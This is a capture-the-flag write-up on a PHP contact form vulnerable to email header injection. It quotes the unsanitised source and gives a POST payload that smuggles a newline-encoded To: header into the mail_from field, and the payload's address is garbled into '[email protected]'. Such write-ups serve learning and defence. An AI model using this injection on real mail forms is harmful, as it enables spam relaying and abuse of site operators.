In this challenge we're presented with a webpage that gives some info. Here's the hint from the main site
```
Spam! The goal is just to send an email to any unexpected recipient, not to become admin. You'll get the flag if a correct attack payload is detected, no bot will visit the page and you'll not get emails if your attack works.
```
The source of the site gives us the actual source code
```php
`<?php
$host = 'mobile-downloads.hax.w3challs.com'; $subject = ''; $message = ''; $from = '';
if (isset($_SERVER['HTTP_HOST'])) $host = htmlentities($_SERVER['HTTP_HOST'], ENT_QUOTES, 'UTF-8'); $to = 'admin@'.$host;
if (isset($_POST) &&
!empty($_POST['mail_from']) &&
!empty($_POST['mail_subject']) &&
!empty($_POST['mail_content']) &&
is_string($_POST['mail_from']) &&
is_string($_POST['mail_subject']) &&
is_string($_POST['mail_content']))
{ $subject = $_POST['mail_subject'];
$message = $_POST['mail_content'];
$from = $_POST['mail_from'];
define('message_prefix', 'Mail sent from %s:'."\n".str_repeat('-', 64)."\n"); $msg = sprintf(message_prefix, $host) . $message;
$headers = 'From: '.$from."\r\n".
'Reply-To: '.$from."\r\n".
'X-Mailer: PHP/'.phpversion();
if (mail($to, $subject, $msg, $headers) === TRUE)
{ printf('<div class="success">The message was sent</div><br />'); $subject = ''; $message = ''; $from = '';
}
else printf('<div class="error">The message cannot be sent</div><br />');
} $subject = htmlentities($subject, ENT_QUOTES, 'UTF-8'); $message = htmlentities($message, ENT_QUOTES, 'UTF-8'); $from = htmlentities($from, ENT_QUOTES, 'UTF-8'); ?>`
```
There are three areas we want to focus in on:
```php
$from = $_POST['mail_from'];
$headers = 'From: '.$from."\r\n".
'Reply-To: '.$from."\r\n".
'X-Mailer: PHP/'.phpversion();
if (mail($to, $subject, $msg, $headers) === TRUE)
```
We can see that we control the `$from` variable and it's not being sanitized before being passed to the `$headers` variable and then passed to the vulnerable mail function. By injecting a `%0ATo:admin@mo...` at the end of the `mail_from` parameter, we get the flag.
Payload:
```
mail_from=memes%40memes.memes%0ATo:
[email protected]&mail_subject=Viagra&mail_content=Viagra`
```
---
Back to [[_WebSite Publish/CTF/CTF Index|CTF Index]]
Tags: #ctf #web #php #injection
Related: